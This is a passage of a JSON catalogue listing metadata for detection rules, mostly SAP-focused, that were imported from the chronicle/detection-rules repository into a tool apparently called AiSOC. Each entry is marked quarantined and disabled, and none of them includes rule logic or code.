"license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/ryuk_sample___sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-safebrowsing-process-creation-hashes-seen-more-than-7-days", "type": "detection", "name": "safebrowsing_process_creation_hashes_seen_more_than_7_days", "description": "safebrowsing_process_creation_hashes_seen_more_than_7_days", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/safebrowsing-process-creation-hashes-seen-more-than-7-days.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "safebrowsing_process_creation_hashes_seen_more_than_7_days", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/safebrowsing_process_creation_hashes_seen_more_than_7_days.yaral" } }, { "id": "chronicle-detection-rules-sans-posterknown-normalfind-evil-sysmon-behaviour", "type": "detection", "name": "sans_posterknown_normalfind_evil__sysmon_behaviour", "description": "sans_posterknown_normalfind_evil__sysmon_behaviour", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sans-posterknown-normalfind-evil-sysmon-behaviour.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sans_posterknown_normalfind_evil__sysmon_behaviour", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/sans_poster_known_normal___find_evil___sysmon_behaviour.yaral" } }, { "id": 
"chronicle-detection-rules-sap-break-glass-account-login", "type": "detection", "name": "sap_break_glass_account_login", "description": "sap_break_glass_account_login", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-break-glass-account-login.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_break_glass_account_login", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_break_glass_account_login.yaral" } }, { "id": "chronicle-detection-rules-sap-brute-force-rfc-logon", "type": "detection", "name": "sap_brute_force_rfc_logon", "description": "sap_brute_force_rfc_logon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-brute-force-rfc-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_brute_force_rfc_logon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_brute_force_rfc_logon.yaral" } }, { "id": 
"chronicle-detection-rules-sap-change-documents-sensitive-profile-assignment", "type": "detection", "name": "sap_change_documents_sensitive_profile_assignment", "description": "sap_change_documents_sensitive_profile_assignment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-change-documents-sensitive-profile-assignment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_change_documents_sensitive_profile_assignment", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_change_documents_sensitive_profile_assignment.yaral" } }, { "id": "chronicle-detection-rules-sap-change-documents-sensitive-profile-assignment-data-table", "type": "detection", "name": "sap_change_documents_sensitive_profile_assignment_data_table", "description": "sap_change_documents_sensitive_profile_assignment_data_table", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-change-documents-sensitive-profile-assignment-data-table.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
"sap_change_documents_sensitive_profile_assignment_data_table", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_change_documents_sensitive_profile_assignment_data_table.yaral" } }, { "id": "chronicle-detection-rules-sap-change-documents-sensitive-role-assignment", "type": "detection", "name": "sap_change_documents_sensitive_role_assignment", "description": "sap_change_documents_sensitive_role_assignment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-change-documents-sensitive-role-assignment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_change_documents_sensitive_role_assignment", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_change_documents_sensitive_role_assignment.yaral" } }, { "id": "chronicle-detection-rules-sap-critial-role-assigned-to-new-user", "type": "detection", "name": "sap_critial_role_assigned_to_new_user", "description": "sap_critial_role_assigned_to_new_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/sap-critial-role-assigned-to-new-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_critial_role_assigned_to_new_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_critial_role_assigned_to_new_user.yaral" } }, { "id": "chronicle-detection-rules-sap-critical-authorization-value-changed", "type": "detection", "name": "sap_critical_authorization_value_changed", "description": "sap_critical_authorization_value_changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-critical-authorization-value-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_critical_authorization_value_changed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_critical_authorization_value_changed.yaral" } }, { "id": "chronicle-detection-rules-sap-critical-role-assigned-to-new-user", "type": "detection", "name": "sap_critical_role_assigned_to_new_user", "description": "sap_critical_role_assigned_to_new_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, 
"playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-critical-role-assigned-to-new-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_critical_role_assigned_to_new_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_critical_role_assigned_to_new_user.yaral" } }, { "id": "chronicle-detection-rules-sap-data-changed-during-debugging", "type": "detection", "name": "sap_data_changed_during_debugging", "description": "sap_data_changed_during_debugging", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-data-changed-during-debugging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_data_changed_during_debugging", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_data_changed_during_debugging.yaral" } }, { "id": "chronicle-detection-rules-sap-deactivation-of-security-audit-log", "type": "detection", "name": "sap_deactivation_of_security_audit_log", "description": "sap_deactivation_of_security_audit_log", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-deactivation-of-security-audit-log.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_deactivation_of_security_audit_log", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_deactivation_of_security_audit_log.yaral" } }, { "id": "chronicle-detection-rules-sap-execution-of-sensitive-abap-program", "type": "detection", "name": "sap_execution_of_sensitive_abap_program", "description": "sap_execution_of_sensitive_abap_program", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-execution-of-sensitive-abap-program.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_execution_of_sensitive_abap_program", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_execution_of_sensitive_abap_program.yaral" } }, { "id": "chronicle-detection-rules-sap-function-module-testing-detected", "type": "detection", "name": "sap_function_module_testing_detected", "description": 
"sap_function_module_testing_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-function-module-testing-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_function_module_testing_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_function_module_testing_detected.yaral" } }, { "id": "chronicle-detection-rules-sap-gateway-acl-bypass-attempt", "type": "detection", "name": "sap_gateway_acl_bypass_attempt", "description": "sap_gateway_acl_bypass_attempt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-gateway-acl-bypass-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_gateway_acl_bypass_attempt", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_gateway_acl_bypass_attempt.yaral" } }, { "id": "chronicle-detection-rules-sap-gateway-ufo-table-access", "type": "detection", "name": 
"sap_gateway_ufo_table_access", "description": "sap_gateway_ufo_table_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-gateway-ufo-table-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_gateway_ufo_table_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_gateway_ufo_table_access.yaral" } }, { "id": "chronicle-detection-rules-sap-hanadb-assign-admin-authorizations", "type": "detection", "name": "sap_hanadb_assign_admin_authorizations", "description": "sap_hanadb_assign_admin_authorizations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-hanadb-assign-admin-authorizations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_hanadb_assign_admin_authorizations", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_hanadb_assign_admin_authorizations.yaral" } }, { "id": 
"chronicle-detection-rules-sap-hanadb-audit-trail-policy-changes", "type": "detection", "name": "sap_hanadb_audit_trail_policy_changes", "description": "sap_hanadb_audit_trail_policy_changes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-hanadb-audit-trail-policy-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_hanadb_audit_trail_policy_changes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_hanadb_audit_trail_policy_changes.yaral" } }, { "id": "chronicle-detection-rules-sap-hanadb-deactivation-of-audit-trail", "type": "detection", "name": "sap_hanadb_deactivation_of_audit_trail", "description": "sap_hanadb_deactivation_of_audit_trail", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-hanadb-deactivation-of-audit-trail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_hanadb_deactivation_of_audit_trail", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": 
"2026-05-04", "upstream_path": "rules/community/sap/sap_hanadb_deactivation_of_audit_trail.yaral" } }, { "id": "chronicle-detection-rules-sap-hanadb-user-admin-actions", "type": "detection", "name": "sap_hanadb_user_admin_actions", "description": "sap_hanadb_user_admin_actions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-hanadb-user-admin-actions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_hanadb_user_admin_actions", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_hanadb_user_admin_actions.yaral" } }, { "id": "chronicle-detection-rules-sap-impossible-travel", "type": "detection", "name": "sap_impossible_travel", "description": "sap_impossible_travel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-impossible-travel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_impossible_travel", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/sap/sap_impossible_travel.yaral" } }, { "id": "chronicle-detection-rules-sap-multi-terminal-logon", "type": "detection", "name": "sap_multi_terminal_logon", "description": "sap_multi_terminal_logon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-multi-terminal-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_multi_terminal_logon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_multi_terminal_logon.yaral" } }, { "id": "chronicle-detection-rules-sap-multiple-password-changes", "type": "detection", "name": "sap_multiple_password_changes", "description": "sap_multiple_password_changes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-multiple-password-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_multiple_password_changes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/sap/sap_multiple_password_changes.yaral" } }, { "id": "chronicle-detection-rules-sap-netweaver-application-server-as-java-cve20206287-detection", "type": "detection", "name": "sap_netweaver_application_server_as_java_cve20206287_detection", "description": "sap_netweaver_application_server_as_java_cve20206287_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-netweaver-application-server-as-java-cve20206287-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_netweaver_application_server_as_java_cve20206287_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/sysmon/sap_netweaver_application_server__as__java_cve_2020_6287_detection.yaral" } }, { "id": "chronicle-detection-rules-sap-security-audit-log-configuration-change", "type": "detection", "name": "sap_security_audit_log_configuration_change", "description": "sap_security_audit_log_configuration_change", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-security-audit-log-configuration-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable 
by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_security_audit_log_configuration_change", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_security_audit_log_configuration_change.yaral" } }, { "id": "chronicle-detection-rules-sap-security-audit-log-user-created-deleted-or-unlocked", "type": "detection", "name": "sap_security_audit_log_user_created_deleted_or_unlocked", "description": "sap_security_audit_log_user_created_deleted_or_unlocked", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-security-audit-log-user-created-deleted-or-unlocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_security_audit_log_user_created_deleted_or_unlocked", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_security_audit_log_user_created_deleted_or_unlocked.yaral" } }, { "id": "chronicle-detection-rules-sap-sensitive-rfc-function-module-execution", "type": "detection", "name": "sap_sensitive_rfc_function_module_execution", "description": "sap_sensitive_rfc_function_module_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-sensitive-rfc-function-module-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_sensitive_rfc_function_module_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_sensitive_rfc_function_module_execution.yaral" } }, { "id": "chronicle-detection-rules-sap-sensitive-role-assignment-correlation", "type": "detection", "name": "sap_sensitive_role_assignment_correlation", "description": "sap_sensitive_role_assignment_correlation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-sensitive-role-assignment-correlation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_sensitive_role_assignment_correlation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_sensitive_role_assignment_correlation.yaral" } }, { "id": "chronicle-detection-rules-sap-sensitive-role-authorization-modification", "type": "detection", "name": "sap_sensitive_role_authorization_modification", "description": "sap_sensitive_role_authorization_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-sensitive-role-authorization-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_sensitive_role_authorization_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_sensitive_role_authorization_modification.yaral" } }, { "id": "chronicle-detection-rules-sap-sensitive-tables-direct-access-by-rfc-logon-data-table", "type": "detection", "name": "sap_sensitive_tables_direct_access_by_rfc_logon_data_table", "description": "sap_sensitive_tables_direct_access_by_rfc_logon_data_table", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-sensitive-tables-direct-access-by-rfc-logon-data-table.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_sensitive_tables_direct_access_by_rfc_logon_data_table", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_sensitive_tables_direct_access_by_rfc_logon_data_table.yaral" } }, { 
"id": "chronicle-detection-rules-sap-sensitive-tables-direct-access-by-rfc-logon-static-list", "type": "detection", "name": "sap_sensitive_tables_direct_access_by_rfc_logon_static_list", "description": "sap_sensitive_tables_direct_access_by_rfc_logon_static_list", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-sensitive-tables-direct-access-by-rfc-logon-static-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_sensitive_tables_direct_access_by_rfc_logon_static_list", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_sensitive_tables_direct_access_by_rfc_logon_static_list.yaral" } }, { "id": "chronicle-detection-rules-sap-suspected-data-exfiltration", "type": "detection", "name": "sap_suspected_data_exfiltration", "description": "sap_suspected_data_exfiltration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-suspected-data-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_suspected_data_exfiltration", "source_commit": "74dd490", "license": "Apache-2.0", 
"license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_suspected_data_exfiltration.yaral" } }, { "id": "chronicle-detection-rules-sap-system-or-client-configuration-change", "type": "detection", "name": "sap_system_or_client_configuration_change", "description": "sap_system_or_client_configuration_change", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-system-or-client-configuration-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_system_or_client_configuration_change", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_system_or_client_configuration_change.yaral" } }, { "id": "chronicle-detection-rules-sap-user-creates-and-uses-new-user", "type": "detection", "name": "sap_user_creates_and_uses_new_user", "description": "sap_user_creates_and_uses_new_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 